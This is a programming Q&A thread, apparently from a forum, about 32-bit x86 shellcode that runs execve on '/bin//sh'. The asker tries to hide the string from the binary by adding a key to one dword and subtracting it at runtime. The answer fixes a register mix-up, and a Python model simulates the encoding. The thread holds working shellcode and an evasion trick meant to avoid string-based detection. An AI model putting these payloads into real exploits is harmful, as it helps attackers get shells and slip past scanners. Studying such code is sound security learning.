
Segmentation fault by replacing an instruction with another that does the same job. Why?

I have this working shellcode that spawns a shell. I have to modify it such that I hide "/bin/sh" or "sh" from appearing anywhere in the binary after compiling. I have hence thought of taking the hex value of /bin/sh (2f 62 69 6e 2f 73 68), adding some random value to it, say 0x11111, moving that value to a register, subtracting 0x11111 at runtime, and then pushing that runtime-generated value (which becomes /bin/sh) onto the stack and doing an execv. But I get a segmentation fault on the 1st step itself, and I am unable to figure out why.

This below code works fine.

section .data

section .text
    global _start
_start:

xor eax,eax            ; eax = 0
cdq                    ; edx = 0 (sign-extension of eax)
push eax               ; NUL terminator for the path string
push long 0x68732f2f   ; "//sh" (little-endian)
push long 0x6e69622f   ; "/bin" (little-endian)
mov ebx,esp            ; ebx -> "/bin//sh"
push eax               ; argv[1] = NULL
push ebx               ; argv[0] = pointer to the path
mov ecx,esp            ; ecx -> argv
mov al,0xb             ; execve syscall number
xor edx,edx            ; envp = NULL
int 0x80

But this change causes a segmentation fault

section .data

section .text
    global _start
_start:

xor eax,eax            ; eax = 0
cdq                    ; edx = 0
push eax               ; NUL terminator for the path string
mov ecx,0x11111        ; the offset that was added to the constant
mov ebx,0x68744040     ; 0x68732f2f ("//sh") + 0x11111
sub ebx,ecx            ; ebx = 0x68732f2f again
push long eax          ; pushes eax
push long 0x6e69622f   ; "/bin" (little-endian)
mov ebx,esp            ; ebx -> string on the stack
push eax               ; argv[1] = NULL
push ebx               ; argv[0]
mov ecx,esp            ; ecx -> argv
mov al,0xb             ; execve syscall number
xor edx,edx            ; envp = NULL
int 0x80

Please help me on this. Will be grateful. Thanks

The code is different, isn't it? Look here:

sub ebx,ecx
push long eax

You compute ebx-ecx, but push eax. And eax is zero.

It should be:

sub ebx,ecx
push long ebx
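To make the register mix-up visible, here is a small Python model (added here; it is not code from the question or the answer) of the add-then-subtract encoding and of the 32-bit pushes, returning the NUL-terminated string that esp points at in the working, broken and fixed variants. The key 0x11111 and the dwords are the ones from the post; the variant names are my own.

```python
import struct

KEY = 0x11111  # the "random value" added to the dword in the question


def dword(chunk: bytes) -> int:
    """Little-endian dword of a 4-byte chunk, i.e. what `push long 0x...` pushes."""
    return struct.unpack("<I", chunk)[0]


def encode(chunk: bytes, key: int = KEY) -> int:
    """Constant that ends up in the binary: dword plus key, modulo 2^32."""
    return (dword(chunk) + key) & 0xFFFFFFFF


def decode(value: int, key: int = KEY) -> int:
    """What `sub ebx, ecx` computes at runtime: the original dword."""
    return (value - key) & 0xFFFFFFFF


def string_at_esp(pushes: list) -> bytes:
    """Model successive 32-bit pushes (stack grows downwards) and return the
    NUL-terminated string esp points at after the last push."""
    mem = b""
    for value in pushes:
        mem = struct.pack("<I", value) + mem  # each push lands below the previous one
    return mem.split(b"\0", 1)[0]


def visible_in_binary(constants: list) -> bytes:
    """Bytes a plain string scan of the immediates would see for these constants."""
    return b"".join(struct.pack("<I", c) for c in constants)


# Pushes in program order, with eax = 0 as in the posted code.
WORKING_PUSHES = [0, 0x68732F2F, 0x6E69622F]          # push eax; push "//sh"; push "/bin"
BROKEN_PUSHES = [0, 0, 0x6E69622F]                    # push eax; push eax (the bug); push "/bin"
FIXED_PUSHES = [0, decode(0x68744040), 0x6E69622F]    # push eax; push ebx (decoded); push "/bin"

if __name__ == "__main__":
    print(hex(encode(b"//sh")))           # 0x68744040, the constant used in the question
    print(string_at_esp(WORKING_PUSHES))  # b'/bin//sh'
    print(string_at_esp(BROKEN_PUSHES))   # b'/bin'  (a directory, so execve cannot succeed)
    print(string_at_esp(FIXED_PUSHES))    # b'/bin//sh'
    print(visible_in_binary([0x68744040, 0x6E69622F]))  # b'@@th/bin': "/bin" is still plain
```

Note that only the second dword was encoded, so a byte scan of the binary still finds "/bin" in the immediates; the broken variant hands execve the path "/bin", which is a directory.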
